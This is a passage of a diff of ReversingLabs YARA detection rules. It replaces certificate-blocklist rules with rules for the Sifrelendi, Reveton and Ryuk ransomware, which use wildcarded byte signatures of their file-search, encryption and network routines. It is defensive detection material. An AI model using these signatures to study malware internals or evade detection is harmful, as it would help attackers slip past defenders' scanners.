15 ?? ?? ?? ?? 48 8D 4C 24 ?? + FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 + ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? + ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 48 8D + 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 + 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? + 4C 8D 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? + ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 39 74 24 ?? 76 + ?? 4C 8D 0D ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 + ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 48 8B CB FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE8\\x80\\x98\\xE5\\x8D\\x87\\xE5\\xA4\\xA9\\xE4\\xB8\\x8B\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="1b:e4:1b:34:12:7c:a9:e6:27:08:30:d2:07:0d:b4:26" and 1352764799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $find_files and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_9B108B8A1Daa0D5581F59Fcee0447901 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sifrelendi : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Sifrelendi ransomware." author = "ReversingLabs" - id = "cacb2af8-dbc6-5d61-a2d5-641c5c09bc79" - date = "2023-11-08" - modified = "2023-11-08" + id = "b9083b7c-eb09-52da-a240-39b51df892f9" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2486-L2504" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "696e3da511f74f9cfb10b96130a36ae9f48c22f1e0deb76092db1262980ab3ac" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sifrelendi.yara#L1-L67" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "430d3877c10c86fcb19b5624dd8886d61e54ccd0453678329309b49712c6d5c6" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sifrelendi" + tc_detection_factor = 5 importance = 25 + strings: + $search_files = { + E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? + ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? + ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 + 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 + ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? + ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB + ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D + C3 + } + $encrypt_files = { + 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 + FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C9 B2 ?? A1 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B F8 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 33 C9 B2 + ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? + ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B 45 + ?? 8B 10 FF 12 50 8B CB 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 6A ?? 6A + ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 12 50 8B 4D ?? 8B D3 8B C7 E8 ?? ?? ?? ?? 8B + C7 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8D 45 + ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CharacTell Ltd" and (pe.signatures[i].serial=="00:9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" or pe.signatures[i].serial=="9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01") and 1380671999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5F8203C430Fc7Db4E61F6684F6829Ffc : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Reveton : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Reveton ransomware." author = "ReversingLabs" - id = "975cd500-2f08-55c9-a821-4dde3a54ae0c" - date = "2023-11-08" - modified = "2023-11-08" + id = "14446b94-cd57-5930-b0af-b21091b61f68" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2506-L2522" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cd22d1beea12d1f6c50f69e76074c2582ce5567887056c43d4d6c87d33fce1bf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Reveton.yara#L1-L118" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2d316c558cdb5591788ef89c6e20327882a118f2928f4a31fb5b8b3083931ac5" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Reveton" + tc_detection_factor = 5 importance = 25 + strings: + $http_connection_1 = { + C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? + ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 E8 ?? ?? ?? ?? 50 8B 45 + ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 06 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 68 + ?? ?? ?? ?? 8B 45 ?? 50 53 E8 ?? ?? ?? ?? 8B 55 ?? 8B 06 8B 4D ?? E8 ?? ?? ?? ?? 83 + 7D ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 + ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8 + } + $raw_socket_connection_1_1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D + ?? 89 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CF E8 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + } + $raw_socket_connection_1_2 = { + C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 80 BD ?? ?? ?? + ?? ?? 74 ?? 33 C0 EB ?? B0 ?? 84 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? + ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 74 ?? 2C ?? 74 + ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? + ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 95 + ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? E8 + } + $raw_socket_connection_1_3 = { + 66 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F B6 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CF + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 + C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 40 ?? 8B 00 8B 00 + 89 85 ?? ?? ?? ?? 8A 94 3D ?? ?? ?? ?? 8A 84 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85 + ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 + ?? ?? ?? ?? E8 + } + $raw_socket_connection_1_4 = { + 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B + 00 50 E8 ?? ?? ?? ?? 40 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? 8B 00 + 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B 00 50 E8 + } + $raw_socket_connection_1_5 = { + C6 85 ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? + ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 66 + 8B 85 ?? ?? ?? ?? 8B D0 66 81 E2 ?? ?? 88 95 ?? ?? ?? ?? 0F B7 C0 C1 E8 ?? 88 85 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? + ?? ?? 40 74 ?? B3 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? + ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 + 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? + ?? ?? ?? C3 + } + $file_search_1_1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 C3 85 DB 74 + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 ?? 8B 45 ?? 50 8D + 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 80 38 ?? 75 ?? + 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 + } + $file_search_1_2 = { + 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? + ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 8B D0 + 03 D3 42 81 FA ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 50 56 8D 85 ?? ?? ?? ?? 03 C3 50 E8 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 + } + $file_search_1_3 = { + 8B F0 83 FE ?? 74 ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 53 ?? + 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 48 50 8D + 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 ?? ?? ?? + ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 + } + $raw_socket_connection_2 = { + 55 8B EC 83 C4 ?? 53 56 8B F2 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? + ?? 64 FF 30 64 89 20 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 8D 45 ?? + 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8B C6 86 E0 66 89 45 ?? 8B 45 + ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B C3 E8 + ?? ?? ?? ?? 83 CB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? + C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Haivision Network Video" and pe.signatures[i].serial=="5f:82:03:c4:30:fc:7d:b4:e6:1f:66:84:f6:82:9f:fc" and 1382572799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($http_connection_1 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 and $raw_socket_connection_1_1 and $raw_socket_connection_1_2 and $raw_socket_connection_1_3 and $raw_socket_connection_1_4 and $raw_socket_connection_1_5) or ($raw_socket_connection_2 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6B6Daef5Be29F20Ddce4B0F5E9Fa6Ea5 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ryuk : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Ryuk ransomware." author = "ReversingLabs" - id = "55611c9a-d45d-55fa-8e5e-a5621223cc9d" - date = "2023-11-08" - modified = "2023-11-08" + id = "179c9277-0bdc-522a-a822-cf93febff408" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2524-L2540" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "edd2f302d2fac65f6a93372a24c3f80757f2b175af661032917366e9629c5491" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ryuk.yara#L1-L199" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bf93892b281be20917656e242cbb0f3b3694439556b7e5e40a424ba1aa909105" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ryuk" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? + 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 + FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? + ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? + ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 + 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 + ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? + ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 83 7D ?? ?? 77 ?? 81 7D + ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? + 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? + 89 55 ?? 83 7D ?? ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 8B 4D ?? 51 + 8B 55 ?? 52 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 + 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 77 + ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 73 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 83 7D ?? ?? 77 ?? 72 + ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 6A + ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 + 55 ?? EB ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 55 ?? + 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D + } + $encrypt_files_p2 = { + 77 ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 77 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8B 4D ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ?? + 83 7D ?? ?? 73 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D + ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F + 86 ?? ?? ?? ?? 8B 4D ?? 81 E9 ?? ?? ?? ?? 89 4D ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? + 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? + ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? + 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? + 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? + ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 0F BE 84 15 + ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? 83 FA ?? 0F + 85 ?? ?? ?? ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? + 0F BE 84 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? + 83 FA ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 8D ?? + ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 66 89 85 ?? ?? 